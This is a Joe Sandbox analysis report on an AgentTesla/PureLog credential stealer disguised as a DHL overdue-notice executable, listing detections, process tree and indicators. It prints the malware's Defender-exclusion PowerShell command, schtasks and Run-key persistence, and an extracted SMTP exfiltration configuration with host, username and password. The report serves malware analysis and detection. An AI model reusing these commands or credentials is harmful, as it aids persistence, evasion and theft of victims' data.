Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe

Overview

General Information

Sample name:DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe
Analysis ID:1432022
MD5:840cbf490ce0600e1057f72949a37c73
SHA1:151c7c81a8f1e9dd889eef12e8c4ca6749495dac
SHA256:b09a0b160629c46cd40123518cf4beed875c630f8836e2fea5d894c43fd58093
Tags:exe
Infos:

Detection

AgentTesla, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Contains functionality to log keystrokes (.Net Source)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to detect virtual machines (SGDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe (PID: 6532 cmdline: "C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe" MD5: 840CBF490CE0600E1057F72949A37C73)
    • powershell.exe (PID: 6880 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1056 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\LJAGvecDW.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 2728 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 4364 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LJAGvecDW" /XML "C:\Users\user\AppData\Local\Temp\tmp87CB.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 3260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 5560 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • WerFault.exe (PID: 4196 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6532 -s 1400 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • LJAGvecDW.exe (PID: 2744 cmdline: C:\Users\user\AppData\Roaming\LJAGvecDW.exe MD5: 840CBF490CE0600E1057F72949A37C73)
    • schtasks.exe (PID: 1444 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LJAGvecDW" /XML "C:\Users\user\AppData\Local\Temp\tmpA44C.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 5656 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • WerFault.exe (PID: 3328 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2744 -s 1760 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • boqXv.exe (PID: 5264 cmdline: "C:\Users\user\AppData\Roaming\boqXv\boqXv.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • conhost.exe (PID: 5616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • boqXv.exe (PID: 2360 cmdline: "C:\Users\user\AppData\Roaming\boqXv\boqXv.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • conhost.exe (PID: 5828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.clslk.com", "Username": "gm@clslk.com", "Password": "NUZRATHinam1978"}
SourceRuleDescriptionAuthorStrings
00000009.00000002.2413879455.0000000002FA2000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000009.00000002.2408863258.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000009.00000002.2408863258.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000001.00000002.2353913822.0000000003A79000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          00000009.00000002.2413879455.0000000002FAA000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 17 entries
            SourceRuleDescriptionAuthorStrings
            1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.71f0000.6.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.71f0000.6.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.3a79970.3.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.3a79970.3.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    9.2.RegSvcs.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                      Click to see the 16 entries

                      System Summary

                      barindex
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe", ParentImage: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe, ParentProcessId: 6532, ParentProcessName: DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe", ProcessId: 6880, ProcessName: powershell.exe
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 5560, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\boqXv
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe", ParentImage: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe, ParentProcessId: 6532, ParentProcessName: DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe", ProcessId: 6880, ProcessName: powershell.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LJAGvecDW" /XML "C:\Users\user\AppData\Local\Temp\tmpA44C.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LJAGvecDW" /XML "C:\Users\user\AppData\Local\Temp\tmpA44C.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\LJAGvecDW.exe, ParentImage: C:\Users\user\AppData\Roaming\LJAGvecDW.exe, ParentProcessId: 2744, ParentProcessName: LJAGvecDW.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LJAGvecDW" /XML "C:\Users\user\AppData\Local\Temp\tmpA44C.tmp", ProcessId: 1444, ProcessName: schtasks.exe
                      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 50.87.253.239, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 5560, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49721
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LJAGvecDW" /XML "C:\Users\user\AppData\Local\Temp\tmp87CB.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LJAGvecDW" /XML "C:\Users\user\AppData\Local\Temp\tmp87CB.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe", ParentImage: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe, ParentProcessId: 6532, ParentProcessName: DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LJAGvecDW" /XML "C:\Users\user\AppData\Local\Temp\tmp87CB.tmp", ProcessId: 4364, ProcessName: schtasks.exe
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe", ParentImage: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe, ParentProcessId: 6532, ParentProcessName: DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe", ProcessId: 6880, ProcessName: powershell.exe

                      Persistence and Installation Behavior

                      barindex
                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LJAGvecDW" /XML "C:\Users\user\AppData\Local\Temp\tmp87CB.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LJAGvecDW" /XML "C:\Users\user\AppData\Local\Temp\tmp87CB.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe", ParentImage: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe, ParentProcessId: 6532, ParentProcessName: DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LJAGvecDW" /XML "C:\Users\user\AppData\Local\Temp\tmp87CB.tmp", ProcessId: 4364, ProcessName: schtasks.exe
                      Timestamp:04/26/24-10:06:29.016387
                      SID:2839723
                      Source Port:49721
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-10:06:29.016387
                      SID:2030171
                      Source Port:49721
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-10:06:40.359218
                      SID:2030171
                      Source Port:49731
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-10:06:40.359218
                      SID:2839723
                      Source Port:49731
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeAvira: detected
                      Source: http://mail.clslk.comAvira URL Cloud: Label: malware
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeAvira: detection malicious, Label: HEUR/AGEN.1305452
                      Source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.466ead0.2.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.clslk.com", "Username": "gm@clslk.com", "Password": "NUZRATHinam1978"}
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeReversingLabs: Detection: 44%
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeVirustotal: Detection: 51%Perma Link
                      Source: DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeVirustotal: Detection: 51%Perma Link
                      Source: DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeReversingLabs: Detection: 44%
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeJoe Sandbox ML: detected
                      Source: DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeJoe Sandbox ML: detected
                      Source: DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: oZr.pdb source: DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe, WER6D7D.tmp.dmp.12.dr, WER93E1.tmp.dmp.22.dr, LJAGvecDW.exe.1.dr
                      Source: Binary string: System.Data.pdb source: WER6D7D.tmp.dmp.12.dr, WER93E1.tmp.dmp.22.dr
                      Source: Binary string: System.Xml.ni.pdb source: WER6D7D.tmp.dmp.12.dr, WER93E1.tmp.dmp.22.dr
                      Source: Binary string: Accessibility.pdb source: WER6D7D.tmp.dmp.12.dr, WER93E1.tmp.dmp.22.dr
                      Source: Binary string: System.ni.pdbRSDS source: WER6D7D.tmp.dmp.12.dr, WER93E1.tmp.dmp.22.dr
                      Source: Binary string: mscorlib.pdbx source: WER93E1.tmp.dmp.22.dr
                      Source: Binary string: RegSvcs.pdb, source: boqXv.exe, 00000012.00000000.2398561366.0000000000F92000.00000002.00000001.01000000.0000000E.sdmp, boqXv.exe.9.dr
                      Source: Binary string: oZr.pdb> source: WER6D7D.tmp.dmp.12.dr, WER93E1.tmp.dmp.22.dr
                      Source: Binary string: System.Configuration.ni.pdb source: WER6D7D.tmp.dmp.12.dr, WER93E1.tmp.dmp.22.dr
                      Source: Binary string: System.pdb(N source: WER93E1.tmp.dmp.22.dr
                      Source: Binary string: mscorlib.ni.pdbRSDS source: WER6D7D.tmp.dmp.12.dr, WER93E1.tmp.dmp.22.dr
                      Source: Binary string: RegSvcs.pdb source: boqXv.exe, 00000012.00000000.2398561366.0000000000F92000.00000002.00000001.01000000.0000000E.sdmp, boqXv.exe.9.dr
                      Source: Binary string: System.Data.ni.pdb source: WER6D7D.tmp.dmp.12.dr, WER93E1.tmp.dmp.22.dr
                      Source: Binary string: System.Configuration.pdb source: WER6D7D.tmp.dmp.12.dr, WER93E1.tmp.dmp.22.dr
                      Source: Binary string: System.Core.pdbH source: WER93E1.tmp.dmp.22.dr
                      Source: Binary string: System.Xml.pdb source: WER6D7D.tmp.dmp.12.dr, WER93E1.tmp.dmp.22.dr
                      Source: Binary string: System.pdb source: WER6D7D.tmp.dmp.12.dr, WER93E1.tmp.dmp.22.dr
                      Source: Binary string: System.Xml.ni.pdbRSDS# source: WER6D7D.tmp.dmp.12.dr, WER93E1.tmp.dmp.22.dr
                      Source: Binary string: System.Core.ni.pdb source: WER6D7D.tmp.dmp.12.dr, WER93E1.tmp.dmp.22.dr
                      Source: Binary string: Microsoft.VisualBasic.pdb source: WER6D7D.tmp.dmp.12.dr, WER93E1.tmp.dmp.22.dr
                      Source: Binary string: System.Windows.Forms.pdbPq source: WER6D7D.tmp.dmp.12.dr
                      Source: Binary string: System.Windows.Forms.pdb source: WER6D7D.tmp.dmp.12.dr, WER93E1.tmp.dmp.22.dr
                      Source: Binary string: mscorlib.pdb source: WER6D7D.tmp.dmp.12.dr, WER93E1.tmp.dmp.22.dr
                      Source: Binary string: System.Drawing.pdb source: WER6D7D.tmp.dmp.12.dr, WER93E1.tmp.dmp.22.dr
                      Source: Binary string: mscorlib.ni.pdb source: WER6D7D.tmp.dmp.12.dr, WER93E1.tmp.dmp.22.dr
                      Source: Binary string: System.Data.ni.pdbRSDS source: WER6D7D.tmp.dmp.12.dr, WER93E1.tmp.dmp.22.dr
                      Source: Binary string: System.Xml.pdb< source: WER6D7D.tmp.dmp.12.dr
                      Source: Binary string: System.Core.pdb source: WER6D7D.tmp.dmp.12.dr, WER93E1.tmp.dmp.22.dr
                      Source: Binary string: System.Core.pdbMZ source: WER6D7D.tmp.dmp.12.dr
                      Source: Binary string: Accessibility.pdb< source: WER93E1.tmp.dmp.22.dr
                      Source: Binary string: System.Drawing.pdb$ source: WER93E1.tmp.dmp.22.dr
                      Source: Binary string: oZr.pdbSHA2560Q source: DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe, LJAGvecDW.exe.1.dr
                      Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER6D7D.tmp.dmp.12.dr, WER93E1.tmp.dmp.22.dr
                      Source: Binary string: System.Data.pdb, source: WER6D7D.tmp.dmp.12.dr, WER93E1.tmp.dmp.22.dr
                      Source: Binary string: System.ni.pdb source: WER6D7D.tmp.dmp.12.dr, WER93E1.tmp.dmp.22.dr
                      Source: Binary string: System.Core.ni.pdbRSDS source: WER6D7D.tmp.dmp.12.dr, WER93E1.tmp.dmp.22.dr

                      Networking

                      barindex
                      Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.6:49721 -> 50.87.253.239:587
                      Source: TrafficSnort IDS: 2839723 ETPRO TROJAN Win32/Agent Tesla SMTP Activity 192.168.2.6:49721 -> 50.87.253.239:587
                      Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.6:49731 -> 50.87.253.239:587
                      Source: TrafficSnort IDS: 2839723 ETPRO TROJAN Win32/Agent Tesla SMTP Activity 192.168.2.6:49731 -> 50.87.253.239:587
                      Source: Yara matchFile source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.46a9af0.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.466ead0.2.raw.unpack, type: UNPACKEDPE
                      Source: global trafficTCP traffic: 192.168.2.6:49721 -> 50.87.253.239:587
                      Source: Joe Sandbox ViewIP Address: 50.87.253.239 50.87.253.239
                      Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
                      Source: global trafficTCP traffic: 192.168.2.6:49721 -> 50.87.253.239:587
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficDNS traffic detected: DNS query: mail.clslk.com
                      Source: RegSvcs.exe, 00000009.00000002.2413879455.0000000002FAA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000014.00000002.3497093745.0000000002C97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.clslk.com
                      Source: DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe, 00000001.00000002.2353195129.0000000002AED000.00000004.00000800.00020000.00000000.sdmp, LJAGvecDW.exe, 0000000D.00000002.2446819021.000000000279D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: Amcache.hve.12.drString found in binary or memory: http://upx.sf.net
                      Source: DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe, 00000001.00000002.2353913822.0000000004467000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2408863258.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.466ead0.2.raw.unpack, umlRMRbjNqD.cs.Net Code: fKv0R
                      Source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.46a9af0.5.raw.unpack, umlRMRbjNqD.cs.Net Code: fKv0R

                      System Summary

                      barindex
                      Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.46a9af0.5.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.466ead0.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.46a9af0.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.466ead0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: initial sampleStatic PE information: Filename: DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeCode function: 1_2_050418081_2_05041808
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeCode function: 1_2_050417F81_2_050417F8
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeCode function: 1_2_0702A6881_2_0702A688
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeCode function: 1_2_07029CC81_2_07029CC8
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeCode function: 1_2_07026CD81_2_07026CD8
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeCode function: 1_2_070239C01_2_070239C0
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeCode function: 1_2_0702C3781_2_0702C378
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeCode function: 1_2_0702C3881_2_0702C388
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeCode function: 1_2_0702A3E01_2_0702A3E0
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeCode function: 1_2_0702A3F01_2_0702A3F0
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeCode function: 1_2_070272711_2_07027271
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeCode function: 1_2_070272801_2_07027280
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeCode function: 1_2_07029CB81_2_07029CB8
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeCode function: 1_2_07349BC01_2_07349BC0
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeCode function: 1_2_07347A201_2_07347A20
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeCode function: 1_2_0734C9001_2_0734C900
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeCode function: 1_2_0734AA601_2_0734AA60
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeCode function: 1_2_0734BED01_2_0734BED0
